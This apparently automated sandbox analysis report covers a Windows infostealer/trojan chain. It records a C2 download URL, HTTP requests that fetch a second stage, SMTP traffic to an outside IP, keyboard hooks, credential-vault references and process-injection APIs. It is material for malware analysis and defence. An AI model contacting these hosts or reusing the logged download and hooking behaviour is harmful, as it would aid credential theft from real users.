Source:	Binary string: ping.pdb source: esentutl.exe, 00000005.00000003.2144839901.0000000004A20000.00000004.00001000.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\Public\Libraries\lxsyrsiW.pif

System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Jump to behavior

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe

Code function: 0_2_02E65908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_02E65908

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then jmp 028B7394h	10_2_028B7108
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then jmp 028B78DCh	10_2_028B767A
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	10_2_028B7E60
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	10_2_028B7E5E
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 4x nop then jmp 065BBCBDh	15_2_065BBA40

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://gxe0.com/yak/233_Wisrysxlfss

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe

Code function: 0_2_02E7E4B8 InternetCheckConnectionA,

0_2_02E7E4B8

Source: global traffic

TCP traffic: 192.168.2.5:49707 -> 51.195.88.199:587

Source: Joe Sandbox View	IP Address: 198.252.105.91 198.252.105.91
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic

Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 198.252.105.91:443

Source: global traffic

TCP traffic: 192.168.2.5:49707 -> 51.195.88.199:587

Source: global traffic	HTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: gxe0.com
Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: s82.gocheapweb.com

Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000018.00000002.4530947899.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.i.lencr.org/0
Source: neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000018.00000002.4530947899.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org0#
Source: neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000018.00000002.4540086325.000000000290C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s82.gocheapweb.com
Source: powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: neworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2254342461.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2286081090.00000000075F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000B.00000002.2286081090.00000000075F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: 2jbMIxCFsK.exe, 2jbMIxCFsK.exe, 00000000.00000002.2224009200.000000002229C000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D44000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002CCD000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2237079375.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2225406008.00000000225FF000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2224009200.000000002223D000.00000004.00000020.00020000.00000000.sdmp, lxsyrsiW.pif, 00000008.00000000.2153332087.0000000000416000.00000002.00000001.01000000.00000006.sdmp, Wisrysxl.PIF, 00000016.00000002.2321565604.0000000002E22000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000017.00000000.2301803862.0000000000416000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.pmail.com
Source: neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: neworigin.exe, 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 0000000B.00000002.2254342461.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: neworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://api.ipify.org
Source: neworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: neworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2286081090.00000000075F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000626000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/
Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020DCD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak/233_Wisrysx
Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020DE3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfss
Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.00000000005BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfsse
Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfssl
Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com:443/yak/233_Wisrysxlfss
Source: powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736

Source: unknown	HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49752 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Code function: 24_2_0640C970 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,0640D7F0,00000000,00000000

24_2_0640C970

Installs a global keyboard hook

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe

Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.0.neworigin.exe.240000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

.NET source code contains very large strings

Source: server_BTC.exe.8.dr, opqcmgIPmeabY.cs	Long String: Length: 17605
Source: TrojanAIbot.exe.10.dr, opqcmgIPmeabY.cs	Long String: Length: 17605

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E78670 NtUnmapViewOfSection,	0_2_02E78670
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E78400 NtReadVirtualMemory,	0_2_02E78400
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E77A2C NtAllocateVirtualMemory,	0_2_02E77A2C
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E7DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_02E7DC8C
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E7DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_02E7DC04
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E78D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_02E78D70
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E7DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_02E7DD70
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E77D78 NtWriteVirtualMemory,	0_2_02E77D78
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E77A2A NtAllocateVirtualMemory,	0_2_02E77A2A
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E7DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_02E7DBB0
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E78D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_02E78D6E
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 22_2_02DB8670 NtUnmapViewOfSection,	22_2_02DB8670
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 22_2_02DB8400 NtReadVirtualMemory,	22_2_02DB8400
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 22_2_02DB7A2C NtAllocateVirtualMemory,	22_2_02DB7A2C
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 22_2_02DB7D78 NtWriteVirtualMemory,	22_2_02DB7D78
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 22_2_02DB8D70 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,	22_2_02DB8D70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 22_2_02DBDD70 NtOpenFile,NtReadFile,NtClose,	22_2_02DBDD70
